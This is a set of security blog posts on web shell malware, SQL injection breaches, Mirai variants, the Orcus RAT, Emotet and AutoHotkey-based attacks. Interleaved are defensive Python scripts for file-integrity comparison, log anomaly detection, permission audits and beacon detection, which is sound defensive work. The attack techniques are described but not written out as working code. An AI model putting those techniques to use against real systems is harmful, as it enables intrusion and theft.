Web Shell Malware Facilitates Cybercriminals' Access to Victims’ Networks, New Report Shows
A recent report from the national security agencies in Australia and the US showed that cybercriminals are increasingly using web shell malware to access victims’ networks.
In a joint advisory, Australia’s national security agency, the Australian Signals Directorate (ASD), and its counterpart in the US, the National Security Agency (NSA), said that cybercriminals have increased their use of web shell malware for computer network exploitation.
"Web shell malware can facilitate cyber attackers' access to a network where they are able to execute arbitrary system commands, enumerate system information, steal data, install additional malicious software or use the infected server to pivot further into the network," the ASD said in a separate statement. The NSA, meanwhile, said in a separate statement, “Malicious cyber actors have increasingly leveraged web shells to gain or maintain access on victim networks.”
What Is Web Shell Malware?
Web shell malware is malicious software that an attacker deploys on a compromised web server, the software to which web browsers connect in order to run web applications. A web application, in turn, is a body of code that performs one or more actions on a web server and returns the result to a web browser.
An example of web shell malware is China Chopper, which allows attackers to execute various commands on the server, including dropping other malware. First found in the wild in 2012, this web shell consists of a short, simple piece of code that can be placed on the target web server by typing it in, with no file transfer needed. Because of its simple code and ease of use, security researchers have difficulty attributing this malware to any particular threat actor or group.
Preventive and Mitigating Measures Against Web Shell Malware
The national security agencies in Australia and the US recommend the following preventive and mitigating measures against web shell malware:
1. Web Application Update
Web shell malware is often created by modifying a file in a legitimate web application. Attackers are able to make malicious changes to legitimate web applications because users fail to apply patches for known security vulnerabilities in those applications in a timely manner.
According to the national security agencies in Australia and the US, web application updates need to be prioritized as attackers sometimes target vulnerabilities in internet-facing and internal web applications within 24 hours of a patch release.
2. Early Detection Methods
Web shell malware is hard to detect with typical detection methods because its authors conceal it with encryption and obfuscation. “Known-good” comparison and monitoring for anomalous network traffic are two of the suggested measures.
In known-good comparison, a verified version of a web application is compared to your organization’s on-hand version of the web application. Discrepancies between the verified version and the on-hand version need to be manually reviewed.
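The known-good comparison described above, as an added example (written for this page, not a script from the ASD/NSA advisory): every file under the verified release and under the deployed copy is hashed, and the differences are reported for manual review. The manifest layout (relative path to SHA-256) and the two directory arguments are assumptions.

```python
"""Known-good comparison of a deployed web application against a verified
baseline. Example code written for this page, not a script from the ASD/NSA
advisory. The manifest format ({relative path: sha256 hex}) is an assumption."""
import hashlib
import os
from pathlib import Path


def sha256_file(path):
    """Hash a file in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every regular file under root (relative POSIX path) to its SHA-256.
    Symlinks are skipped here; a symlink planted in a docroot deserves its own review."""
    root_path = Path(root)
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root_path):
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_symlink():
                continue
            manifest[p.relative_to(root_path).as_posix()] = sha256_file(p)
    return manifest


def compare_to_known_good(known_good, on_hand):
    """Return the discrepancies an analyst must review by hand:
    added    - files on the server that the verified release does not contain
               (where a dropped web shell usually shows up),
    modified - files whose content differs from the verified copy
               (e.g. a shell appended to a legitimate page),
    missing  - files the verified release has but the server lacks."""
    kg, oh = set(known_good), set(on_hand)
    return {
        "added": sorted(oh - kg),
        "modified": sorted(p for p in kg & oh if known_good[p] != on_hand[p]),
        "missing": sorted(kg - oh),
    }


def audit(known_good_root, deployed_root):
    """Compare two directory trees: the verified release and the on-hand copy."""
    return compare_to_known_good(build_manifest(known_good_root),
                                 build_manifest(deployed_root))


if __name__ == "__main__":
    import sys
    # usage: script.py /path/to/verified-release /var/www/html
    for kind, paths in audit(sys.argv[1], sys.argv[2]).items():
        for p in paths:
            print(f"{kind:9}{p}")
```

The verified release should come from the vendor's package or your own build artefact store, never from the server being checked.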
Depending on the attacker, any of the following could be indicators of anomalous network traffic resulting from web shell malware: unusually large responses (an indicator of data exfiltration), recurring off-peak access, typically during non-working hours, and requests from an unlikely geographical location (an indicator of a foreign threat actor).
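The three traffic indicators above applied to web server access logs, as an added example written for this page rather than taken from the advisory. It assumes the Apache/nginx "combined" log format; the working hours, expected countries, size threshold and the IP-to-country table are constructed stand-ins for a real policy and GeoIP lookup.

```python
"""Flag the anomalous-traffic indicators from the advisory in access logs:
unusually large responses, recurring off-peak access, unlikely locations.
Example code written for this page, not from the advisory."""
import re
from collections import Counter
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Assumptions for this example: working hours, expected countries, size threshold.
WORK_HOURS = range(7, 19)            # 07:00-18:59 server local time
EXPECTED_COUNTRIES = {"CA", "US"}
LARGE_RESPONSE_BYTES = 1_000_000     # 1 MB from a single request is worth a look

# Constructed stand-in for a GeoIP lookup; unknown IPs resolve to "??".
GEO = {"198.51.100.7": "CA", "203.0.113.5": "XX", "192.0.2.44": "US"}


def parse_line(line):
    """Parse one combined-format line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["when"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["bytes"] = 0 if d["bytes"] == "-" else int(d["bytes"])
    return d


def indicators(entry):
    """Names of the indicators a single request trips."""
    hits = []
    if entry["bytes"] >= LARGE_RESPONSE_BYTES:
        hits.append("large_response")
    when = entry["when"]
    if when.hour not in WORK_HOURS or when.weekday() >= 5:
        hits.append("off_peak")
    if GEO.get(entry["ip"], "??") not in EXPECTED_COUNTRIES:
        hits.append("unlikely_geo")
    return hits


def analyse(lines, min_off_peak_hits=3):
    """Per-path summary of which indicators fired. Off-peak access is reported
    only when it recurs (min_off_peak_hits), since one late request is normal;
    the other two indicators are reported on a single hit."""
    per_path = {}
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        per_path.setdefault(e["path"], Counter()).update(indicators(e))
    report = {}
    for path, c in per_path.items():
        flags = {k for k in ("large_response", "unlikely_geo") if c[k]}
        if c["off_peak"] >= min_off_peak_hits:
            flags.add("recurring_off_peak")
        if flags:
            report[path] = sorted(flags)
    return report


# Constructed sample log: a normal page, plus one script hit repeatedly at
# night from an unexpected country, once returning 5 MB.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Apr/2020:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Apr/2020:02:14:07 +0000] "POST /img/cache.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Apr/2020:02:15:09 +0000] "POST /img/cache.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Apr/2020:02:13:58 +0000] "POST /img/cache.php HTTP/1.1" 200 5242880 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [22/Apr/2020:23:40:00 +0000] "GET /index.php HTTP/1.1" 200 4821 "-" "curl/7.64"',
]

if __name__ == "__main__":
    for path, flags in analyse(SAMPLE_LOG).items():
        print(path, ", ".join(flags))
```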
3. Harden Web Application Permissions
According to the national security agencies in Australia and the US, web applications shouldn’t have permission to write directly to a web accessible directory or modify web accessible code. The national security agencies said that malicious actors are unable to upload a web shell to a vulnerable web application if the web server blocks access to the web accessible directory.
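One way to check the permission rule above on a Unix-style web server, as an added example written for this page (not from the advisory): walk the web-accessible directory and list every file or directory that the web server's account could write to. It handles classic mode bits only (no ACLs); the uid and gids of the server account are supplied by the caller.

```python
"""Audit a web-accessible directory for anything the web server account could
write, the condition a web shell upload relies on. Example code written for
this page, not from the advisory. Classic Unix mode bits only (no ACLs)."""
import os
import stat
from pathlib import Path


def writable_by(mode, file_uid, file_gid, uid, gids):
    """Would an account with this uid and these gids pass the write check?
    Mirrors the kernel's owner/group/other order; uid 0 writes anything."""
    if uid == 0:
        return True
    if file_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if file_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_docroot(root, uid, gids):
    """Return {'dirs': [...], 'files': [...]} of paths under root (relative,
    '.' for root itself) that the account can write. A writable directory
    matters as much as a writable file: it lets a new file be created there."""
    root_path = Path(root)
    candidates = [(root_path, "dirs")]
    for dirpath, dirnames, filenames in os.walk(root_path):
        candidates += [(Path(dirpath) / d, "dirs") for d in dirnames]
        candidates += [(Path(dirpath) / f, "files") for f in filenames]
    findings = {"dirs": [], "files": []}
    for p, bucket in candidates:
        st = p.lstat()
        if stat.S_ISLNK(st.st_mode):
            continue  # link mode bits are meaningless; audit the target instead
        if writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gids):
            findings[bucket].append(p.relative_to(root_path).as_posix())
    for bucket in findings:
        findings[bucket].sort()
    return findings


if __name__ == "__main__":
    import sys
    # usage: script.py /var/www/html <uid> <gid>[,<gid>...]
    root, uid = sys.argv[1], int(sys.argv[2])
    gids = tuple(int(g) for g in sys.argv[3].split(","))
    for bucket, paths in audit_docroot(root, uid, gids).items():
        for p in paths:
            print(f"{bucket[:-1]} writable by uid {uid}: {p}")
```

Anything the script lists should be moved out of the web root (uploads, caches, sessions) or made read-only for the server account.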
In February of this year, Microsoft reported that attackers uploaded a web shell in multiple folders on the web server owned by an organization in the public sector. "DART’s [Microsoft’s Detection and Response Team] investigation showed that the attackers uploaded a web shell in multiple folders on the web server, leading to the subsequent compromise of service accounts and domain admin accounts,” Microsoft said. “This allowed the attackers to perform reconnaissance using net.exe, scan for additional target systems using nbtstat.exe, and eventually move laterally using PsExec.”
4. Use Intrusion Prevention
A Web Application Firewall (WAF) adds an extra layer of defence for web applications by blocking some known attacks. Attackers, however, have been known to evade this signature-based blocking, so a WAF should be only one part of an organization’s overall security measures. A WAF may block the initial compromise but is unlikely to detect web shell traffic.
5. Network Segmentation
Network segmentation refers to the practice of dividing a network into sub-networks. This practice ensures that in case a particular sub-network is compromised by attackers, the other sub-networks won’t be affected.
For instance, internet-facing servers should be placed in their own sub-network. Network segmentation blocks web shell propagation by preventing connections to other sub-networks. “While web shells could still affect a targeted server, network segmentation prevents attackers from chaining web shells to reach deeper into an organization’s network,” the national security agencies in Australia and the US said.
6. Harden Web Servers
Securing the configuration of your organization’s web servers can prevent the deployment of web shell malware. As additional measures to harden web servers, the national security agencies in Australia and the US recommend that access to unused ports or services should be blocked, and routine vulnerability scanning should be conducted to identify unknown weaknesses in an environment.
Threat Actors Continue to Target Websites
The European Central Bank (ECB) shut down one of its websites following the discovery that malicious actors accessed the site without authority and infected it with malicious software (malware). This incident shows that threat actors continue to target websites.
ECB, in a statement, said that unauthorized parties had breached the Bank’s Integrated Reporting Dictionary (BIRD) website, a site purposely built to provide the banking industry with details on how to produce statistical and supervisory reports. The Bank said that contact data, including email addresses, names and position titles of 481 subscribers to the BIRD newsletter may have been stolen by the attackers.
ECB, in a statement, said that the attack on the BIRD website was discovered during “regular maintenance work”. An ECB spokesman told Reuters that the earliest evidence found of the website attack dated back to December 2018, which means that the attack had gone unnoticed for months before being discovered during maintenance work.
This isn’t the first time that ECB has reported an attack on its IT infrastructure. In 2014, ECB disclosed that an unknown attacker or attackers had breached another of the Bank’s websites, one used for registrations for Bank events such as conferences and visits.
The 2014 website attack, the Bank said, led to the theft of email addresses and other contact data left by individuals registering for events at the ECB. This 2014 attack on one of the Bank’s websites only became known after an anonymous email was sent to the Bank asking for financial compensation in exchange for the stolen data.
In the latest attack on one of its websites, ECB said the attackers “succeeded in injecting malware onto the external server to aid phishing activities”. In the 2014 attack, ECB said the malicious actor or actors attacked a “database serving its public website”. Beyond those phrases, not much is known about the “injection” and “database” attacks.
The Open Web Application Security Project (OWASP) lists injection attacks as the number one threat to web security. Injection attacks are a broad class of attacks that allow attackers to gain access to the database records of vulnerable websites. In certain cases, this type of attack allows attackers to gain administrative rights to a database.
One example of an injection attack is SQL injection, also known as SQLi. SQL, which stands for Structured Query Language, is the query language understood by databases. By inserting malicious SQL into input fields on websites, such as web forms, attackers can gain access to the database records of vulnerable websites, resulting in unauthorized access to any data available in the database.
In late 2007 and early 2008, thousands of websites were defaced as a result of SQL injection attacks. According to researchers at Microsoft, these particular SQL injection attacks didn’t exploit vulnerabilities in Windows, IIS, SQL Server or other infrastructure code; rather, they exploited vulnerabilities in custom web applications running on this infrastructure. Thousands of websites were affected due to 2 factors: first, there was an automated tool to launch this attack, and second, this SQL attack tool spread through the use of a botnet.
SANS reported that thousands of websites were compromised in late 2007 and early 2008 as the attacker or attackers used an automated tool that queried search engines to find vulnerable web applications and then exploited them. “The exploit just consisted of an SQL statement that tried to inject a script tag into every HTML page on the web site,” SANS reported. SecureWorks, meanwhile, reported that the automated SQL attack tool spread to thousands of websites because the attackers relied on a botnet – a group of computers or devices infected by the same malware and controlled by an attacker for malicious purposes, in this case the spread of the SQL attack tool.
Beyond using an automated tool and a botnet to attack websites indiscriminately, SQL injection has also been used by attackers in targeted attacks. According to the U.S. Federal Bureau of Investigation (FBI), a malicious group obtained confidential information from Sony Pictures’ computer systems between May 27, 2011 and June 2, 2011 using an SQL injection attack against Sony Pictures’ website.
According to the UK's Information Commissioner's Office, SQL injection was also used in the TalkTalk cyber attack on the company’s website. As a result of the SQL injection attack on TalkTalk’s website, personal details of 156,959 customers, including their names, addresses, dates of birth, phone numbers and email addresses, were stolen. The attacker also stole the bank account number and sort code of 15,656 TalkTalk customers.
As these examples show, injection attacks on websites are highly detrimental to the affected organizations. Loss of customer trust is one potential cost of an SQL injection attack, should personally identifiable information such as full names, addresses and credit card details be stolen.
One measure for preventing injection attacks such as SQL injection is a web application firewall (WAF). A WAF is often used to filter out injection attacks such as SQL injection. To filter out SQL injection attacks, a WAF uses a list of signatures that address specific attack vectors. This list is regularly updated to provide new filtering rules for newly discovered security vulnerabilities.
At The Driz Group, we specialize in protecting your websites and web applications with instant attack mitigation and guaranteed DDoS protection. We support all deployment types, including cloud and on-premise. Setup takes several minutes and there is nothing to buy, support, or maintain.
Connect with us today for a free consultation and protect your websites, web applications, online reputation and mission critical data.
Mirai Malware Variants Increasingly Targeting Enterprise IoT Devices
Malware variants that evolved from the original Mirai malware are increasingly targeting enterprise IoT devices, putting at risk enterprise networks from being exploited for nefarious activities such as distributed denial-of-service (DDoS) attacks and illicit cryptocurrency mining, as well as putting at risk enterprise cloud architecture from additional malware and further compromise.
Tracking the Mirai
The original Mirai malware was created by Paras Jha, Josiah White and Dalton Norman. The 3 creators of the Mirai malware in due course were arrested and sentenced by U.S. authorities. Prior to their arrest and sentencing, the source code of the Mirai malware was publicly released. The publication of the source code propelled the creation of multiple versions of Mirai to propagate in the wild.
Mirai was first observed in the wild in 2016. The malware gained notoriety when it was used by a still unidentified attacker or attackers to launch a distributed denial-of-service (DDoS) attack on Dyn DNS, a major dynamic DNS provider, which resulted in widespread internet outages across the U.S. and Europe in 2016.
According to the IBM X-Force researchers, since 2016, there have been 63 Mirai variants observed in the wild. The researchers said that the multiple variants of Mirai have been used to perform nefarious activities such as DDoS attacks and illicit cryptocurrency mining.
In a DDoS attack, attackers overwhelm a target, such as a website or, in the case of Dyn DNS, a dynamic DNS provider, with voluminous traffic, taking the target offline and rendering it inaccessible to legitimate users. Illicit cryptocurrency mining, meanwhile, refers to the use of a computer’s processing power to mine cryptocurrency without the knowledge and consent of the computer’s owner.
The Mirai malware variants are able to perform DDoS attacks and illicit cryptocurrency mining by infecting computers that have security vulnerabilities and enslaving them into an army, also known as a botnet, which then carries out DDoS attacks, cryptocurrency mining or other activities at the whim of the attacker controlling the botnet. Mirai is a powerful tool for malicious actors because it allows them to automate the downloading of any number of malware programs onto a large number of IoT devices.
Owners of IoT devices typically don’t consider these devices to be computers. These devices are often installed and then forgotten. Unlike other computers such as desktops or laptops, IoT devices aren’t monitored for irregular behaviour, nor are they updated or their login details changed.
The original malware created by Jha, White and Norman infected hundreds of thousands of IoT devices, such as routers and security cameras, and controlled these infected devices as an army or botnet to perform illegal activities such as DDoS attacks. The creators of the original malware were able to infect hundreds of thousands of IoT devices knowing that many IoT owners don’t bother to change the factory default login details of these devices. The original Mirai uses 61 factory default login details to infect IoT devices.
Enterprise IoT Devices at Risk
IBM X-Force researchers, who have been tracking Mirai campaigns since 2016, said that the tactics, techniques and procedures (TTPs) of the Mirai variants are now aimed at enterprise IoT devices.
“Nowadays, enterprise IoT devices are everywhere, from instruments that monitor patients in hospitals, to wireless devices in smart meters that relay information to utility companies, to robots in warehouses that constantly deliver inventory information,” IBM X-Force researchers said. “Enterprises are increasingly dependent on IoT devices to run day-to-day operations, and attackers are well-aware of the growing attack surface.”
“As IoT devices become more common among households and large organizations, Mirai and its variants will continue to evolve to adapt to the changing environments and targets of its choice,” IBM X-Force researchers added.
The researchers observed that creators of the Mirai malware variants were dropping additional malware onto the infected devices, with cryptocurrency-mining malware leading the way. Cryptocurrency-mining malware, which steals the computing power of infected IoT devices to generate money for the attackers, is harmful to IoT devices, which are prone to overheating because they have little computing power compared to desktop or laptop computers with central processing unit (CPU) or graphics processing unit (GPU) resources. IBM X-Force researchers also observed that creators of Mirai malware variants were using steganography, hiding malicious code in images that trigger the download of additional malware.
The researchers also said that the Mirai malware variants pose a threat to cloud computing, as IoT devices infected with Mirai malware variants that are connected to cloud architecture could allow attackers to gain access to cloud servers. Once these malicious actors gain access to cloud servers, they could drop additional malware, the IBM X-Force researchers said.
In early 2019, researchers at Palo Alto Networks' Unit 42 discovered a variant of the Mirai malware targeting WePresent WiPG-1000 Wireless Presentation systems and LG Supersign TVs – IoT devices used by businesses. Targeting IoT devices used by businesses, according to the Unit 42 researchers, gives attackers a large attack surface, as such devices have larger bandwidth, giving the attackers greater firepower for attacks such as DDoS.
As malicious actors are increasingly targeting enterprise IoT devices, it’s important to change the factory default usernames and passwords of these devices and to install the latest security updates. If the IoT vendor no longer issues security updates, or it isn’t possible to install security updates on these devices, it’s best to remove these devices from your organization’s network.
Get in touch with our experts for additional threat information and to help you mitigate cybersecurity risks.
Canada’s Anti-Spam Legislation (CASL) Goes After Malware Distributors
Canada’s Anti-Spam Legislation (CASL), the federal law which took effect in 2014, has proved to be more than anti-spam legislation with its recent application against malicious actors spreading malicious software (malware).
The Canadian Radio-television and Telecommunications Commission (CRTC), in tandem with the Royal Canadian Mounted Police (RCMP), on March 27, 2019 executed a warrant at the home of a Toronto software developer behind the remote access trojan (RAT) called “Orcus”. A remote access trojan, in general, is a type of malware that facilitates covert and unauthorized remote access, enabling a malicious actor to access someone else's computer, wherever it is geographically located, and make changes to it without the owner’s consent.
What Is Canada’s Anti-Spam Legislation (CASL)?
Canada’s Anti-Spam Legislation (CASL), which amended the Canadian Radio-television and Telecommunications Commission Act, covers more than just spam emails. Pertinent provisions of the law include:
Section 6: It is prohibited to send or cause or permit to be sent to an electronic address a commercial electronic message unless the person to whom the message is sent has consented to receiving it, whether the consent is express or implied.
Section 7: It is prohibited, in the course of a commercial activity, to alter or cause to be altered the transmission data in an electronic message so that the message is delivered to a destination other than or in addition to that specified by the sender, unless the alteration is made with the express consent of the sender or the person to whom the message is sent; or the alteration is made in accordance with a court order.
Section 8: A person must not, in the course of a commercial activity, install or cause to be installed a computer program on any other person’s computer system or, having so installed or caused to be installed a computer program, cause an electronic message to be sent from that computer system, unless the person has obtained the express consent of the owner or an authorized user of the computer system; or the person is acting in accordance with a court order.
Section 9: It is prohibited to aid, induce, procure or cause to be procured the doing of any act contrary to any of sections 6 to 8.
The maximum penalty for violating CASL is $1,000,000 in the case of an individual, and $10,000,000 in case the violator is an organization.
What Is Orcus RAT?
While authorities refused to name the subject of the March 27, 2019 CRTC warrant, the person who calls himself “Armada” said in a statement that his organization called “Orcus Technologies” was the subject of the said warrant. Since early 2016, Orcus Technologies has marketed Orcus RAT as a legitimate remote administration tool – a software that gives a person full access to a computer as if the person had physical access to the device.
Armada said authorities seized numerous backup hard drives which contained a large portion of Orcus Technologies business, including user information inclusive of user names, real names and financial transactions. As a result of the seizure, Armada said Orcus RAT is no longer a “safe or secure solution to Remote Administrative needs”.
One standout feature of the Orcus RAT is its capability to load custom plugins built by users, as well as plugins available from the Orcus repository. While Orcus Technologies claims that Orcus RAT is a legitimate remote administration tool, it listed on its website capabilities that are beyond the scope of a legitimate remote administration tool, such as disabling the light indicator on webcams so that the target is not alerted that the camera is on; restarting the server component or triggering a Blue Screen of Death (BSOD) if someone tries to kill its process; and a plugin that can be used to perform distributed denial-of-service (DDoS) attacks.
Orcus RAT also features capabilities such as password retrieval and key logging that are normally not seen in legitimate remote administration tools but only seen in remote access trojans, which facilitate covert and unauthorized remote access.
One such remote access trojan, which facilitates the installation of the Orcus RAT, was unleashed in December 2017 via a phishing campaign – a type of cyber-attack that uses spam emails as a weapon. The spam emails arrived in the inboxes of targeted bitcoin investors, offering Gunbot, a trading automation software for cryptocurrencies. These spam emails contained an attachment. Analysis by researchers at Fortinet showed that when the recipient opens this attachment, it downloads from a specific URL a file that contains the malware, and embedded in this malware is the Orcus RAT.
The Orcus RAT malware in this case, Fortinet researchers said, resulted in the loss of cryptocurrency investments and more. “In our investigation of Orcus RAT, we have again proven that its capabilities go beyond the scope of a harmless administration tool,” the researchers said. “Regardless of the developer’s claim and defense, the reality is that the application is being used in cybercrime campaigns.”
CRTC Director Neil Barratt told KrebsOnSecurity that CASL gives authorities leeway to get malicious actors off the networks in Canada and elsewhere, as the burden of proof required under CASL is lower than that for a criminal conviction.
“We’re dealing with a lower burden of proof than a criminal conviction, and CASL gives us a little more leeway to get bad actors off our networks in Canada and to ultimately improve security for people here and hopefully elsewhere,” Barratt said. “We have great power in CASL and Section 9 makes it a violation to aid in the doing of a violation. And this extends quite broadly, across email service providers and various intermediaries.”
Malicious Email Campaigns Geo-Target Canadian Organizations, Report Says
Canadian organizations are increasingly becoming the targets of cyber-attackers as shown in the recent discovery of nearly 100 malicious email campaigns specifically targeting organizations based in Canada.
In the report "Beyond 'North America' - Threat actors target Canada specifically", researchers at Proofpoint reported that between January 1, 2019 and May 1, 2019, threat actors conducted nearly 100 malicious email campaigns that specifically targeted Canadian organizations or were customized for Canadian audiences.
Malicious Email Campaigns
A malicious email campaign, also known as a phishing scam, is a type of cyber-attack that uses email as a weapon. Phishing emails contain malicious attachments or malicious links.
Downloading the malicious attachment or clicking the malicious link can lead to compromise. Victims are tricked into opening the malicious email and downloading the attachment or clicking the link because threat actors use branding familiar to the recipients.
In the recent malicious email campaigns detected by Proofpoint researchers, the top affected organizations in Canada include financial services, energy/utilities, manufacturing, healthcare and technology. The researchers also observed that some of the malicious emails sent were customized for the French-speaking recipients in Canada.
In the nearly 100 malicious email campaigns specifically targeting Canadian organizations, Proofpoint researchers also observed that the threat actors tricked the victims into opening the malicious email or downloading the malicious attachment or clicking the malicious link by stealing the branding of several notable Canadian companies and agencies including national banks, major shipping and logistics organizations and government agencies.
“Emotet in particular, with its frequent region-specific email campaigns, is bringing new attention to geo-targeting in Canada …,” Proofpoint researchers said.
The first version of the malicious software (malware) Emotet, which was first observed in 2014 targeting German and Austrian victims, functioned as a banking trojan – a type of malware designed to steal financial data.
Since then, Emotet has evolved into a powerful malware, with its ability to continuously evolve and update its capabilities for various online criminal activities from information stealing to distributed denial-of-service (DDoS) attacks. In recent years, instead of delivering its own banking trojan, Emotet has delivered third-party banking trojans such as Qbot, The Trick, IcedID and Gootkit.
In 2018, the United States Computer Emergency Readiness Team (US-CERT) issued an alert warning about the dangers of Emotet. "Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors,” US-CERT said. “Emotet infections have cost SLTT governments up to $1 million per incident to remediate.”
One of the reasons why Emotet continues to be among the most costly and destructive malware is its worm-like capability, that is, the ability to spread from computer to computer without any human action.
Emotet has been known to spread from computer to computer without any human interaction by accessing Server Message Block (SMB), an internet standard protocol that Windows uses to share files, printers and serial ports. “Emotet’s access to SMB can result in the infection of entire domains (servers and clients),” US-CERT said.
Emotet is also capable of spreading its own phishing emails without human interaction through the use of an Outlook scraper, a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses these names and email addresses to send out additional phishing emails from the compromised accounts.
According to Proofpoint researchers, the threat actor called “TA542” is the primary actor behind Emotet. Proofpoint researchers said that this threat actor is known to use the latest version of Emotet and develops malicious emails specific to given regions in the world.
"TA542 typically distributes high volume email campaigns consisting of hundreds of thousands or even millions of messages targeting all industries,” Proofpoint researchers said. “TA542 is currently one of the most prolific actors in the entire threat landscape. With TA542’s international reach and high volume campaign strategy, we expect Emotet use to continue to grow in the upcoming quarters.”
Even as Emotet has evolved in terms of capabilities, one thing remains constant with this malware: delivery is always via malicious email. As the delivery is always via malicious email, it’s important to protect your organization’s email system from this threat through the following mitigating measures:
Here are additional cyber-security measures in order to block or mitigate the effects of Emotet:
Timely identification and mitigation of IT risks can save your business from suffering costly consequences. Call us today and we will show you how to better protect your staff and your sensitive information against targeted attacks.
Legitimate Windows Tool AutoHotkey Now Part of Cyber Attackers’ Arsenal to Avoid Detection
Researchers at Trend Micro have discovered new malicious software (malware) that uses AutoHotkey – a tool for Microsoft Windows originally aimed at providing easy keyboard shortcuts – enabling attackers to avoid detection, steal certain information and even gain remote control of a compromised computer.
This latest malware, according to Trend Micro researchers, initially infects a computer via a spear phishing attack, a form of targeted cyber-attack that uses an email as a weapon. The malicious email used by the attackers contains a malicious attachment disguised as a legitimate Excel file.
According to the researchers, at first glance this disguised Excel file has only one filled sheet. On scrutiny, however, the file has another sheet with two seemingly blank columns. On closer inspection, the attackers had written malicious code in these two columns using a white font, hiding the code in plain view.
Once the email recipient enables macros to open the disguised Excel file, AutoHotkey is dropped onto the victim’s computer. The researchers said that the legitimate tool AutoHotkey allows the attackers to connect to a server they control every 10 seconds to download, save and execute script files.
AutoHotkey, in this case, downloaded and executed TeamViewer, a software that allows attackers to gain remote control over the compromised computer. The researchers noted that AutoHotkey can download and execute other script files depending on the command it receives from the server controlled by the attackers.
Other malicious actions carried out via AutoHotkey in this newly discovered malware include the creation of a link file in the startup folder for AutoHotkeyU32.exe, allowing the attack to persist even after a system restart, and the sending of the volume serial number of the C drive, which allows the attacker to identify the victim’s computer.
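The fixed 10-second polling described above is something a defender can hunt for in network-connection telemetry: a process that reaches the same destination at short, nearly constant intervals. This added example (written for this page, not Trend Micro's code) groups connection events by process and destination and reports the pairs whose inter-connection gaps are short and regular; the event format is a constructed simplification of an endpoint network log, and the thresholds are assumptions.

```python
"""Hunting for fixed-interval polling (the behaviour described on this page)
from the defender's side. Example code written for this page, not Trend
Micro's. Event format: '<ISO timestamp> <image path without spaces> <ip:port>'
(a constructed simplification of a network-connection log)."""
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev


def parse_event(line):
    """Split one constructed event line into (datetime, image, destination)."""
    ts, image, dest = line.split(" ", 2)
    return datetime.fromisoformat(ts), image, dest


def find_beacons(lines, min_events=6, max_interval=60.0, max_jitter_ratio=0.2):
    """Group connections by (image, destination) and report pairs whose gaps
    between connections are short and nearly constant. A human-driven client
    produces irregular gaps; a script polling a server does not.
    Returns {(image, dest): median gap in seconds}."""
    times = defaultdict(list)
    for line in lines:
        when, image, dest = parse_event(line)
        times[(image, dest)].append(when)
    beacons = {}
    for key, ts in times.items():
        if len(ts) < min_events:
            continue                          # too few samples to judge
        ts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        med = median(gaps)
        if med <= 0 or med > max_interval:
            continue                          # slow, or duplicate timestamps
        if pstdev(gaps) / med <= max_jitter_ratio:
            beacons[key] = med
    return beacons


AHK = r"C:\Users\u\AppData\Local\Temp\AutoHotkeyU32.exe"
BROWSER = r"C:\Users\u\AppData\Local\Chromium\Application\chrome.exe"

# Constructed sample: the AutoHotkey process polls one host every ~10 s while
# a browser talks to a content host at irregular, user-driven times.
SAMPLE_EVENTS = [
    f"2020-05-01T09:00:00 {AHK} 198.51.100.20:80",
    f"2020-05-01T09:00:02 {BROWSER} 203.0.113.9:443",
    f"2020-05-01T09:00:05 {BROWSER} 203.0.113.9:443",
    f"2020-05-01T09:00:10 {AHK} 198.51.100.20:80",
    f"2020-05-01T09:00:20 {AHK} 198.51.100.20:80",
    f"2020-05-01T09:00:31 {AHK} 198.51.100.20:80",
    f"2020-05-01T09:00:41 {AHK} 198.51.100.20:80",
    f"2020-05-01T09:00:51 {AHK} 198.51.100.20:80",
    f"2020-05-01T09:00:52 {BROWSER} 203.0.113.9:443",
    f"2020-05-01T09:01:01 {AHK} 198.51.100.20:80",
    f"2020-05-01T09:02:52 {BROWSER} 203.0.113.9:443",
    f"2020-05-01T09:02:54 {BROWSER} 203.0.113.9:443",
    f"2020-05-01T09:03:40 {BROWSER} 203.0.113.9:443",
    f"2020-05-01T09:05:00 {BROWSER} 203.0.113.9:443",
]

if __name__ == "__main__":
    for (image, dest), gap in find_beacons(SAMPLE_EVENTS).items():
        print(f"{image} -> {dest}: every ~{gap:.0f}s")
```

Legitimate software also polls on a timer (update checkers, monitoring agents), so a hit is a lead to triage, with the process path and the startup-folder link file above as the corroborating evidence.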
“We have yet to conclude this attack’s exact purpose,” researchers at Trend Micro said. “For now, we can surmise that it has the makings of a potential targeted attack because of its cyber espionage capabilities, as well as the potential for delivering ransomware and coinminer.”
History of AutoHotkey
AutoHotkey is a free, open-source scripting language that was initially developed to provide easy keyboard shortcuts for Windows. The software later evolved beyond keyboard shortcuts, as it allows Windows users to automate any desktop task, including monitoring programs, setting up scheduled tasks, and automating repetitive operations inside third-party software. The software was initially released 10 years ago, with its stable release only in November 2018.
The evolution of AutoHotkey made it an attractive tool for attackers. AutoHotkey, also known in the online gaming community as AHK, has been used numerous times in creating online game cheating tools. Beyond the gaming world, cyber attackers with varied criminal intents have made AutoHotkey as an addition to their attack arsenal.
